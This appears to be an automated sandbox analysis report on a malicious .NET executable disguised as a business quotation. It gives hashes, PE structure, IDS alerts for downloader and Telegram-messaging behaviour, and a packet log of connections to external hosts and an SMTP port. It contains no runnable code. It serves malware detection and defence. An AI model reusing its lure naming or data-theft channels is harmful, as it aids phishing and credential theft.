                                                                                                                                            Malicious:true
                                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                            Entropy (8bit):7.76634166552624
                                                                                                                                            TrID:
                                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                            File name:QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                                                                                                                                            File size:948'224 bytes
                                                                                                                                            MD5:dac368e84e853adec2a5bb1cd87cd1c6
                                                                                                                                            SHA1:139c10cfa59c1e25039c02671010009de25a2690
                                                                                                                                            SHA256:ece7de25d48e50e93d3d60f600a7676fe24a520916844f6826b4837ac8dd7ebc
                                                                                                                                            SHA512:823336a9f2016c7144d863000606e45b839746163d4f921150c283021dd06c6def082b66660888fdc70141b989f9d01f4332d3d626c030c962453c78977fe9ac
                                                                                                                                            SSDEEP:24576:c8yNK1t4NK1tOqLBPitz9yZJLjsqk488RBAUt6a:rhkLyZJLjs74Bv
                                                                                                                                            TLSH:74150214374AEB13C0A65BF40821E2F467B86D8DA921D7078FDA3EEF7D367142984663
                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...I.................0..n..........F.... ........@.. ....................................@................................
                                                                                                                                            Icon Hash:00928e8e8686b000
                                                                                                                                            Entrypoint:0x4e8d46
                                                                                                                                            Entrypoint Section:.text
                                                                                                                                            Digitally signed:false
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            Subsystem:windows gui
                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                            Time Stamp:0x9F119049 [Mon Jul 27 01:26:33 2054 UTC]
                                                                                                                                            TLS Callbacks:
                                                                                                                                            CLR (.Net) Version:
                                                                                                                                            OS Version Major:4
                                                                                                                                            OS Version Minor:0
                                                                                                                                            File Version Major:4
                                                                                                                                            File Version Minor:0
                                                                                                                                            Subsystem Version Major:4
                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                            Instruction
                                                                                                                                            jmp dword ptr [00402000h]
                                                                                                                                            call far 0000h : 003E9999h
                                                                                                                                            aas
                                                                                                                                            int CCh
                                                                                                                                            dec esp
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe8cf1 | 0x4f | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xea000 | 0x594 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xec000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0xe6840 | 0x70 | .text |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| .text | 0x2000 | 0xe6d5c | 0xe6e00 | d14335d9c07c25fa8104c1db55857ea9 | False | 0.9128199868029236 | data | 7.772032192483331 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xea000 | 0x594 | 0x600 | 353d0ec41c762c77249cd2170d942295 | False | 0.4147135416666667 | data | 4.044538078882215 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xec000 | 0xc | 0x200 | 4c9a42ac309fa4db4eb76f55b413868e | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| RT_VERSION | 0xea090 | 0x304 | data | | | 0.4326424870466321 |
| RT_MANIFEST | 0xea3a4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347 |
| DLL | Import |
| mscoree.dll | _CorExeMain |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
| 2025-01-13T13:05:39.859137+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49709 | 132.226.8.169 | 80 | TCP |
| 2025-01-13T13:05:41.859041+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49709 | 132.226.8.169 | 80 | TCP |
| 2025-01-13T13:05:42.077762+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49712 | 132.226.8.169 | 80 | TCP |
| 2025-01-13T13:05:42.450306+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49715 | 104.21.112.1 | 443 | TCP |
| 2025-01-13T13:05:43.062131+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49712 | 132.226.8.169 | 80 | TCP |
| 2025-01-13T13:05:43.327755+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49717 | 132.226.8.169 | 80 | TCP |
| 2025-01-13T13:05:43.625419+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49718 | 104.21.112.1 | 443 | TCP |
| 2025-01-13T13:05:44.515344+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49720 | 132.226.8.169 | 80 | TCP |
| 2025-01-13T13:05:44.796487+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49721 | 132.226.8.169 | 80 | TCP |
| 2025-01-13T13:05:45.044845+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49722 | 104.21.112.1 | 443 | TCP |
| 2025-01-13T13:05:46.860599+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49727 | 104.21.112.1 | 443 | TCP |
| 2025-01-13T13:05:49.596058+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49735 | 104.21.112.1 | 443 | TCP |
| 2025-01-13T13:05:49.804688+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49736 | 104.21.112.1 | 443 | TCP |
| 2025-01-13T13:05:52.512798+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49746 | 104.21.112.1 | 443 | TCP |
| 2025-01-13T13:05:53.687599+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.8 | 49749 | 149.154.167.220 | 443 | TCP |
| 2025-01-13T13:05:54.883718+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.8 | 49751 | 149.154.167.220 | 443 | TCP |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
                                                                                                                                            Jan 13, 2025 13:05:42.467559099 CET8049717132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:42.557293892 CET44349716104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:42.557384014 CET49716443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:42.559319973 CET49716443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:42.559328079 CET44349716104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:42.559634924 CET44349716104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:42.608977079 CET49716443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:42.610739946 CET49716443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:42.651324034 CET44349716104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:42.720797062 CET44349716104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:42.720859051 CET44349716104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:42.721458912 CET49716443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:42.724061012 CET49716443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:42.728001118 CET4971280192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:42.732794046 CET8049712132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:43.021131992 CET8049712132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:43.022833109 CET49718443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:43.022870064 CET44349718104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:43.022972107 CET49718443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:43.023338079 CET49718443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:43.023351908 CET44349718104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:43.062130928 CET4971280192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:43.287961960 CET8049717132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:43.289324045 CET49719443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:43.289354086 CET44349719104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:43.289647102 CET49719443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:43.289724112 CET49719443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:43.289736032 CET44349719104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:43.327754974 CET4971780192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:43.477722883 CET44349718104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:43.479413033 CET49718443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:43.479429007 CET44349718104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:43.625439882 CET44349718104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:43.625504017 CET44349718104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:43.625591993 CET49718443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:43.626202106 CET49718443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:43.629208088 CET4971280192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:43.630413055 CET4972080192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:43.634211063 CET8049712132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:43.634293079 CET4971280192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:43.635251045 CET8049720132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:43.635334015 CET4972080192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:43.635449886 CET4972080192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:43.640244007 CET8049720132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:43.762914896 CET44349719104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:43.764627934 CET49719443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:43.764652014 CET44349719104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:43.897233963 CET44349719104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:43.897299051 CET44349719104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:43.897409916 CET49719443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:43.897989988 CET49719443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:43.901704073 CET4971780192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:43.902987957 CET4972180192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:43.906716108 CET8049717132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:43.906786919 CET4971780192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:43.907985926 CET8049721132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:43.908072948 CET4972180192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:43.908154011 CET4972180192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:43.912970066 CET8049721132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:44.462898970 CET8049720132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:44.464006901 CET49722443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:44.464057922 CET44349722104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:44.464127064 CET49722443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:44.464395046 CET49722443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:44.464415073 CET44349722104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:44.515343904 CET4972080192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:44.749408007 CET8049721132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:44.750895977 CET49723443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:44.750936031 CET44349723104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:44.752521038 CET49723443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:44.752742052 CET49723443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:44.752763033 CET44349723104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:44.796487093 CET4972180192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:44.919125080 CET44349722104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:44.921561956 CET49722443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:44.921588898 CET44349722104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:45.044855118 CET44349722104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:45.044922113 CET44349722104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:45.045017004 CET49722443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:45.045408964 CET49722443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:45.049928904 CET4972480192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:45.054775000 CET8049724132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:45.054878950 CET4972480192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:45.054955959 CET4972480192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:45.059757948 CET8049724132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:45.246880054 CET44349723104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:45.248462915 CET49723443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:45.248509884 CET44349723104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:45.394140959 CET44349723104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:45.394193888 CET44349723104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:45.394253016 CET49723443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:45.394707918 CET49723443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:45.399507046 CET4972580192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:45.404406071 CET8049725132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:45.404469967 CET4972580192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:45.404594898 CET4972580192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:45.409426928 CET8049725132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:46.057955980 CET8049724132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:46.059230089 CET49726443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:46.059278965 CET44349726104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:46.059362888 CET49726443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:46.059673071 CET49726443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:46.059686899 CET44349726104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:46.109045982 CET4972480192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:46.250083923 CET8049725132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:46.251140118 CET49727443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:46.251179934 CET44349727104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:46.251240015 CET49727443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:46.251456976 CET49727443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:46.251472950 CET44349727104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:46.296545982 CET4972580192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:46.535216093 CET44349726104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:46.537425041 CET49726443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:46.537452936 CET44349726104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:46.670774937 CET44349726104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:46.670838118 CET44349726104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:46.670979977 CET49726443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:46.671339035 CET49726443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:46.674856901 CET4972480192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:46.675939083 CET4972880192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:46.680325031 CET8049724132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:46.680407047 CET4972480192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:46.680879116 CET8049728132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:46.680960894 CET4972880192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:46.681027889 CET4972880192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:46.685807943 CET8049728132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:46.730376959 CET44349727104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:46.731973886 CET49727443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:46.731996059 CET44349727104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:46.860600948 CET44349727104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:46.860666037 CET44349727104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:46.860743999 CET49727443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:46.861274958 CET49727443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:46.865602970 CET4972580192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:46.866349936 CET4972980192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:52.807337046 CET4974580192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:52.812352896 CET8049745132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:52.812412024 CET4974580192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:52.815291882 CET49749443192.168.2.8149.154.167.220
                                                                                                                                            Jan 13, 2025 13:05:52.815332890 CET44349749149.154.167.220192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:52.815407991 CET49749443192.168.2.8149.154.167.220
                                                                                                                                            Jan 13, 2025 13:05:52.815824986 CET49749443192.168.2.8149.154.167.220
                                                                                                                                            Jan 13, 2025 13:05:52.815840960 CET44349749149.154.167.220192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.354266882 CET8049748132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.356257915 CET49750443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:53.356307983 CET44349750104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.356625080 CET49750443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:53.356785059 CET49750443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:53.356798887 CET44349750104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.406008959 CET4974880192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:53.449354887 CET44349749149.154.167.220192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.449672937 CET49749443192.168.2.8149.154.167.220
                                                                                                                                            Jan 13, 2025 13:05:53.454336882 CET49749443192.168.2.8149.154.167.220
                                                                                                                                            Jan 13, 2025 13:05:53.454349041 CET44349749149.154.167.220192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.454725981 CET44349749149.154.167.220192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.466419935 CET49749443192.168.2.8149.154.167.220
                                                                                                                                            Jan 13, 2025 13:05:53.507332087 CET44349749149.154.167.220192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.687707901 CET44349749149.154.167.220192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.687952995 CET44349749149.154.167.220192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.688324928 CET49749443192.168.2.8149.154.167.220
                                                                                                                                            Jan 13, 2025 13:05:53.692096949 CET49749443192.168.2.8149.154.167.220
                                                                                                                                            Jan 13, 2025 13:05:53.808639050 CET44349750104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.811959982 CET49750443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:53.811981916 CET44349750104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.949291945 CET44349750104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.949412107 CET44349750104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.949770927 CET49750443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:53.950095892 CET49750443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:53.960031033 CET4974880192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:53.960850000 CET49751443192.168.2.8149.154.167.220
                                                                                                                                            Jan 13, 2025 13:05:53.960897923 CET44349751149.154.167.220192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.960968971 CET49751443192.168.2.8149.154.167.220
                                                                                                                                            Jan 13, 2025 13:05:53.961407900 CET49751443192.168.2.8149.154.167.220
                                                                                                                                            Jan 13, 2025 13:05:53.961421967 CET44349751149.154.167.220192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.965045929 CET8049748132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.965143919 CET4974880192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:54.634798050 CET44349751149.154.167.220192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:54.634960890 CET49751443192.168.2.8149.154.167.220
                                                                                                                                            Jan 13, 2025 13:05:54.636919022 CET49751443192.168.2.8149.154.167.220
                                                                                                                                            Jan 13, 2025 13:05:54.636926889 CET44349751149.154.167.220192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:54.637187958 CET44349751149.154.167.220192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:54.640036106 CET49751443192.168.2.8149.154.167.220
                                                                                                                                            Jan 13, 2025 13:05:54.683336020 CET44349751149.154.167.220192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:54.883831978 CET44349751149.154.167.220192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:54.884016991 CET44349751149.154.167.220192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:54.884119034 CET49751443192.168.2.8149.154.167.220
                                                                                                                                            Jan 13, 2025 13:05:54.886984110 CET49751443192.168.2.8149.154.167.220
                                                                                                                                            Jan 13, 2025 13:05:58.917501926 CET4972180192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:59.278548002 CET49752587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:05:59.283401966 CET58749752208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:59.283504009 CET49752587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:00.032485008 CET58749752208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:00.032660007 CET49752587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:00.037400961 CET58749752208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:00.078706980 CET4972080192.168.2.8132.226.8.169
